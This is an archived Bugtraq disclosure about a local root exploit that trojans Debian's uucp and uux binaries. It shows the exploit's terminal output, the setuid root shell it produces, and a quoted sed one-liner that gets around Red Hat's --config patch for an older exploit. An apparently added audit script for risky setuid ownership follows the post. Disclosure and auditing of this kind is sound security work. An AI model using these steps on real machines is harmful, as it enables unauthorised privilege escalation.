Bugtraq mailing list archives

Re: uucp --config patch -- not sufficient


From: Charles 'core' Stevenson <core () bokeoa com>
Date: Sun, 20 Jan 2002 04:22:53 -0700

On debian the uucp and uux binaries are owned by the uucp user.
Additionally /usr/lib/uucp is writable by the uucp user. This allows
us to have some fun since we don't have that nasty makewhatis, but we
can still get root by trojaning uucp and uux and hoping a root owned
process executes either one. Attached is an exploit based on zen's which
trojans uucp and uux transparently to root or the user by allowing
normal execution and hiding the true argv[0]. If root runs the command
we create a suid shell in /var/tmp.

[core@devastator:~/tmp/debian-uucp]$ ./exp-erm.sh
o Checking if uucp is installed
o Creating exploit files
o Sent the commands : Sleeping 2 seconds.
o Cleaning up /var/tmp
o Trojaning uucp and uux
o Running the uucp shell. You should remove this when you're done.
sh-2.05$ ls -l .sushi
-rwxrwxr-x    1 core     core         5078 Jan 20 03:54 .sushi

Root haplessly runs uux or uucp:

root@devastator:~# uucp --help
Taylor UUCP 1.06.1, copyright (C) 1991, 92, 93, 94, 1995 Ian Lance
Taylor
Usage: uucp [options] file1 [file2 ...] dest
 -c,--nocopy: Do not copy local files to spool directory
 -C,-p,--copy: Copy local files to spool directory (default)
 -d,--directories: Create necessary directories (default)
 -f,--nodirectories: Do not create directories (fail if they do not
exist)
 -g,--grade grade: Set job grade (must be alphabetic)
 -m,--mail: Report status of copy by mail
 -n,--notify user: Report status of copy by mail to remote user
 -R,--recursive: Copy directories recursively
 -r,--nouucico: Do not start uucico daemon
 -s,--status file: Report completion status to file
 -j,--jobid: Report job id
 -W,--noexpand: Do not add current directory to remote filenames
 -t,--uuto: Emulate uuto
 -u,--usage name: Set user name
 -x,--debug debug: Set debugging level
 -I,--config file: Set configuration file to use
 -v,--version: Print version and exit
 --help: Print help and exit

Checking back in with the hacker we find a suid shell :)

sh-2.05$ ls -l .sushi
-rwsr-xr-x    1 root     root         5078 Jan 20 03:54 .sushi
sh-2.05$ ./.sushi
sh-2.05# 

Tested on stable and unstable. This exploit is not specific to any
certain arch.

Best Regards,
Charles 'core' Stevenson

zen-parse wrote:

Problem:        uucp patch from RedHat (possibly others) prevents
                original exploit, but not variations.

Severity:       Potential for local root on some distributions,
                uucp.uucp on others.

      https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=54466

I had seen this report some time ago, and thought: "Good. They've got a
bug report. That'll get it fixed. They'll check that before they release a
new version, at least."

They didn't.

The patch does prevent the original exploit from working.

However, a trivial patch to the exploit I posted makes it work again.
local user -> uucp (via this problem) -> root (on some distributions, via
/usr/sbin/makewhatis: '${PATH:0:1} (or similar) + redirection characters'
issue.)

$ cd redhat7.0-uucp-to-root
$ sed s/--config/--confi/ < exp-erm.sh >tmp-exp-erm.sh
$ mv tmp-exp-erm.sh exp-erm.sh
$ ./runme

and wait for /tmp/rootshell to appear.

(Does anyone at RedHat actually read their bugzilla posts? Might it not be
an idea to make anything flagged as security actually get looked at by
someone? 2001-10-09 seems a long time for that to go unnoticed.)

-- zen-parse

--
-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse () gmx net, it
may be redistributed without modification.
2) In any other case the contents of this message is confidential and not
to be distributed in any form without express permission from the author.
This document may contain Unclassified Controlled Nuclear Information.

Attachment: debian-uucp.tar.gz
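As an added defender-side check, not code from this advisory or from the uucp package, the script below flags the misconfiguration the report relies on: a privileged program owned by a non-root account that can overwrite it or replace it in its directory. It assumes bash and GNU stat(1); the owner and mode values used to exercise it are constructed.

```shell
#!/bin/bash
# Added audit helper; not part of this advisory or of the uucp package.
# Flags the condition the report describes: a program that root will run is
# owned by a non-root account that can overwrite or replace it.

# Pure check on supplied values so it can be exercised offline.
# Args: file owner, file mode (octal, as printed by `stat -c %a`),
#       directory owner, directory mode.
# Prints the reason and returns 0 when the owner could replace the file;
# prints nothing and returns 1 otherwise.
owner_replaceable() {
    local owner=$1 mode=$2 dir_owner=$3 dir_mode=$4
    [ "$owner" = root ] && return 1
    # Owner write bit on the file itself (0200): the account can rewrite it.
    if [ $(( 0$mode & 0200 )) -ne 0 ]; then
        echo "file is writable by its non-root owner $owner"; return 0
    fi
    # Owner-writable directory owned by the same account: file can be swapped.
    if [ "$dir_owner" = "$owner" ] && [ $(( 0$dir_mode & 0200 )) -ne 0 ]; then
        echo "directory is writable by $owner, file can be replaced"; return 0
    fi
    # World-writable directory without the sticky bit (01000): anyone can swap it.
    if [ $(( 0$dir_mode & 0002 )) -ne 0 ] && [ $(( 0$dir_mode & 01000 )) -eq 0 ]; then
        echo "directory is world-writable without sticky bit"; return 0
    fi
    return 1
}

# Wrapper for real paths; assumes GNU stat(1) as on Debian. Prints one RISK
# line per flagged path and returns 0 if anything was flagged, 1 otherwise.
audit_paths() {
    local p dir reason status=1
    for p in "$@"; do
        [ -e "$p" ] || continue
        dir=$(dirname "$p")
        if reason=$(owner_replaceable "$(stat -c %U "$p")" "$(stat -c %a "$p")" \
                                      "$(stat -c %U "$dir")" "$(stat -c %a "$dir")"); then
            echo "RISK $p: $reason"; status=0
        fi
    done
    return $status
}

# Scan every setuid/setgid program on the host when invoked with --scan.
if [ "${1:-}" = "--scan" ]; then
    find / -xdev -type f \( -perm -4000 -o -perm -2000 \) -print |
        while IFS= read -r p; do audit_paths "$p"; done
fi
```

A binary owned by uucp with mode 4755, as in the Debian case above, is flagged on the first rule even before the directory is considered.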